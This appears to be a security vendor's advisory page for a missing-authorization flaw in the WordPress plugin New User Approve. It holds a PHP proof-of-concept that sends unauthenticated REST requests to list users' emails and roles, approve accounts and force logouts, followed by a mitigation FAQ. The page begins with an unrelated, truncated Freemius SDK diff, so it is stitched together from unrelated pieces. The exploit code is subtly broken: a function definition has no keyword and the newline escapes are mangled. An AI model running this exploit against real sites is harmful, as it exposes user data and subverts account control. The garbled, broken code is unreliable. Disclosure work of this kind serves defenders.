+		 * Check if module has any release on Freemius,
+		 * or all plugin's code is on WordPress.org (Serviceware).
+		 *
+		 * @return bool
+		 */
+		function has_release_on_freemius() {
+			return ! $this->is_org_repo_compliant() ||
+			       $this->has_premium_version();
+		}
+
+		/**
+		 * Checks if it's a freemium plugin.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		function is_freemium() {
+			return $this->has_paid_plan() &&
+			       $this->has_free_plan();
+		}
+
+		/**
+		 * Check if module has only one plan.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.2.1.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_single_plan();
+
+		#endregion
+
+		/**
+		 * Check if running payments in sandbox mode.
+		 *
+		 * @since 1.0.4
+		 *
+		 * @return bool
+		 */
+		abstract function is_payments_sandbox();
+
+		/**
+		 * Check if running test vs. live plugin.
+		 *
+		 * @since 1.0.5
+		 *
+		 * @return bool
+		 */
+		abstract function is_live();
+
+		/**
+		 * Check if running premium plugin code.
+		 *
+		 * @since 1.0.5
+		 *
+		 * @return bool
+		 */
+		abstract function is_premium();
+
+		/**
+		 * Get upgrade URL.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.2
+		 *
+		 * @param string $period Billing cycle.
+		 *
+		 * @return string
+		 */
+		abstract function get_upgrade_url( $period = WP_FS__PERIOD_ANNUALLY );
+
+		/**
+		 * Check if Freemius was first added in a plugin update.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.5
+		 *
+		 * @return bool
+		 */
+		function is_plugin_update() {
+			return ! $this->is_plugin_new_install();
+		}
+
+		/**
+		 * Check if Freemius was part of the plugin when the user installed it first.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.5
+		 *
+		 * @return bool
+		 */
+		abstract function is_plugin_new_install();
+
+		#----------------------------------------------------------------------------------
+		#region Marketing
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if current user purchased any other plugins before.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function has_purchased_before();
+
+		/**
+		 * Check if current user classified as an agency.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_agency();
+
+		/**
+		 * Check if current user classified as a developer.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_developer();
+
+		/**
+		 * Check if current user classified as a business.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_business();
+
+		#endregion
 	}
 No newline at end of file
--- a/new-user-approve/freemius/includes/class-freemius.php
+++ b/new-user-approve/freemius/includes/class-freemius.php
@@ -1,26368 +1,26368 @@
-<?php
-    /**
-     * @package     Freemius
-     * @copyright   Copyright (c) 2015, Freemius, Inc.
-     * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
-     * @since       1.0.3
-     */
-    if ( ! defined( 'ABSPATH' ) ) {
-        exit;
-    }
-
-    // "final class"
-    class Freemius extends Freemius_Abstract {
-        /**
-         * SDK Version
-         *
-         * @var string
-         */
-        public $version = WP_FS__SDK_VERSION;
-
-        #region Plugin Info
-
-        /**
-         * @since 1.0.1
-         *
-         * @var string
-         */
-        private $_slug;
-
-        /**
-         * @since 1.0.0
-         *
-         * @var string
-         */
-        private $_plugin_basename;
-        /**
-         * @since 2.2.1
-         *
-         * @var string
-         */
-        private $_premium_plugin_basename;
-        /**
-         * @since 1.0.0
-         *
-         * @var string
-         */
-        private $_free_plugin_basename;
-        /**
-         * @since 1.0.0
-         *
-         * @var string
-         */
-        private $_plugin_dir_path;
-        /**
-         * @since 1.0.0
-         *
-         * @var string
-         */
-        private $_plugin_dir_name;
-        /**
-         * @since 1.0.0
-         *
-         * @var string
-         */
-        private $_plugin_main_file_path;
-        /**
-         * @var string[]
-         */
-        private $_plugin_data;
-        /**
-         * @since 1.0.9
-         *
-         * @var string
-         */
-        private $_plugin_name;
-        /**
-         * @since 1.2.2
-         *
-         * @var string
-         */
-        private $_module_type;
-
-        #endregion Plug

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0832 - New User Approve <= 3.2.2 - Missing Authorization to Unauthenticated Arbitrary User Approval, Denial, and Information Disclosure

<?php

$target_url = 'http://vulnerable-wordpress-site.com';

// Function to make unauthenticated REST API requests
exploit_nua_endpoint($endpoint, $method = 'GET', $data = []) {
    global $target_url;
    
    $url = $target_url . '/wp-json/new-user-approve/v1/' . $endpoint;
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
    if ($method === 'POST' && !empty($data)) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/json',
            'Accept: application/json'
        ]);
    }
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return [
        'code' => $http_code,
        'body' => json_decode($response, true)
    ];
}

// Step 1: Enumerate pending users and their information
echo "[+] Step 1: Enumerating users via information disclosuren";
$users = exploit_nua_endpoint('get-users');
if ($users['code'] === 200 && !empty($users['body'])) {
    echo "Found " . count($users['body']) . " users:n";
    foreach ($users['body'] as $user) {
        echo "  - ID: " . $user['id'] . ", Email: " . $user['email'] . ", Role: " . $user['role'] . ", Status: " . $user['status'] . "n";
        
        // Store first pending user for approval/denial demo
        if (!isset($demo_user_id) && $user['status'] === 'pending') {
            $demo_user_id = $user['id'];
            $demo_user_email = $user['email'];
        }
    }
} else {
    echo "Failed to enumerate users. HTTP Code: " . $users['code'] . "n";
}

// Step 2: Approve a pending user (if found)
if (isset($demo_user_id)) {
    echo "n[+] Step 2: Approving user ID " . $demo_user_id . " (" . $demo_user_email . ")n";
    $approve = exploit_nua_endpoint('approve-user', 'POST', [
        'user_id' => $demo_user_id,
        'status' => 'approved'
    ]);
    
    if ($approve['code'] === 200) {
        echo "Successfully approved user!n";
    } else {
        echo "Approval failed. HTTP Code: " . $approve['code'] . "n";
    }
}

// Step 3: Deny a different user (demonstrate both actions)
// In real exploitation, attacker would target specific users
echo "n[+] Step 3: Demonstrating user denial capabilityn";
echo "To deny a user, send POST to /approve-user with status: 'denied'n";
echo "Example payload: {'user_id': 123, 'status': 'denied'}n";

// Step 4: Force logout of a user
echo "n[+] Step 4: Demonstrating forced logout capabilityn";
if (isset($demo_user_id)) {
    $logout = exploit_nua_endpoint('logout-user', 'POST', [
        'user_id' => $demo_user_id
    ]);
    
    if ($logout['code'] === 200) {
        echo "Successfully forced logout for user ID " . $demo_user_id . "n";
    } else {
        echo "Logout failed. HTTP Code: " . $logout['code'] . "n";
    }
}

echo "n[+] Exploitation demonstration complete.n";
echo "This PoC shows unauthenticated attackers can:n";
echo "1. Retrieve sensitive user information (CWE-200)n";
echo "2. Approve or deny user registrations (CWE-862)n";
echo "3. Force users to log out (CWE-306)n";

?>

Frequently Asked Questions

What is CVE-2026-0832?
Overview of the vulnerability
CVE-2026-0832 is a high-severity vulnerability in the New User Approve plugin for WordPress, affecting versions up to and including 3.2.2. It allows unauthenticated attackers to approve or deny user accounts, retrieve sensitive user information, and force logout of privileged users due to missing authorization checks on REST API endpoints.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the absence of proper capability checks on multiple REST API endpoints. Attackers can send unauthenticated HTTP requests to these endpoints, allowing them to manipulate user approval processes and access sensitive data without needing valid credentials.
Who is affected by CVE-2026-0832?
Identifying vulnerable users
Any WordPress site using the New User Approve plugin version 3.2.2 or earlier is vulnerable to this issue. Site administrators should check their plugin version and review their user management practices to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the New User Approve plugin installed on your WordPress site. If it is version 3.2.2 or earlier, your site is at risk. Additionally, you can review the plugin’s REST API endpoints for unauthorized access.
How can I fix or mitigate this issue?
Updating the plugin
The recommended fix is to update the New User Approve plugin to version 3.2.3 or later, which includes the necessary security patches. Regularly updating all plugins and monitoring for security advisories is essential for maintaining site security.
What does the CVSS score of 7.3 indicate?
Understanding the risk level
A CVSS score of 7.3 is classified as high severity, indicating a significant risk to the confidentiality, integrity, and availability of the affected system. This means that successful exploitation can lead to serious security breaches, including unauthorized access to sensitive user data.
What kind of data can be exposed due to this vulnerability?
Potential information disclosure
Exploitation of CVE-2026-0832 can lead to the disclosure of sensitive user information such as email addresses, user roles, and approval statuses. This information can be used for targeted attacks against users and the site itself.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided illustrates how an attacker can make unauthenticated requests to the vulnerable REST API endpoints. By manipulating the requests, an attacker can approve or deny user accounts, demonstrating the ease of exploitation due to the lack of authorization checks.
What are the consequences of a successful attack?
Impact on site security
Successful exploitation of this vulnerability can lead to unauthorized control over user management, allowing attackers to approve malicious accounts, deny legitimate registrations, and disrupt site operations. This can result in significant security risks, including account takeovers and denial-of-service conditions.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, consider implementing security plugins that monitor for unauthorized access and enforce strong user authentication practices. Regular security audits and user role reviews can also help mitigate risks associated with vulnerabilities.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the New User Approve plugin until a secure version can be installed. Additionally, restrict access to the REST API endpoints through server configurations or security plugins to minimize exposure.
How can I stay informed about similar vulnerabilities?
Monitoring security advisories
To stay informed about vulnerabilities affecting WordPress and its plugins, subscribe to security mailing lists, follow relevant security blogs, and monitor the official WordPress security updates page. Regularly checking for updates from plugin developers is also crucial.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations